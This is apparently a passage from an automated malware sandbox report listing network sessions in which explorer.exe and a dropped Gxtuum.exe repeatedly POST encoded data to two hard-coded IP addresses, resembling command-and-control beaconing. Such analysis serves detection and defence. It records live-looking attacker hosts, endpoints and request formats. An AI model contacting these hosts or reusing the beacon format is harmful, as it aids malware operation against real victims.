Dec 13, 2024 01:38:40.125686884 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:40.245870113 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:41.751837969 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50003	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:41.985169888 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:42.105762005 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:43.419528961 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50002	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:42.011835098 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:43.320122957 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50007	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:42.136322021 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:43.507548094 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50008	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:43.660439014 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:43.783406019 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:45.263254881 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50014	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:45.191076994 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:46.514014006 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50015	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:45.361780882 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:46.694461107 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50016	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:45.500108004 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:45.621090889 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:47.138717890 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50017	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:47.377542019 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:47.497476101 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:49.000658035 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	50023	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:48.211309910 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:49.554466963 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50024	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:48.394035101 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:49.742000103 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50025	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:49.234886885 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:49.354929924 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:50.891608953 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50031	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:51.125825882 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:51.245946884 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:52.560362101 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50032	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:51.451699018 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:52.772864103 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50033	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:51.699517012 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:53.006556034 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	50034	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:52.803030014 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:52.923086882 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:54.263041973 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	50040	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:54.500850916 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:54.620675087 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:55.966187000 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	50041	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:54.535326958 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:55.885842085 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	50042	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:54.662138939 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:38:56.023236036 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	50048	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:56.204641104 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:56.324753046 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:57.650346994 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	50049	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:57.733798981 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:59.100663900 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	50050	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:57.837287903 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:38:59.178493977 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	50051	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:57.875531912 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:57.995436907 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:38:59.499635935 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	50057	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:38:59.745054007 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:38:59.864869118 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:39:01.388092041 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	50058	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:00.891752958 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:39:02.226515055 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	50059	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
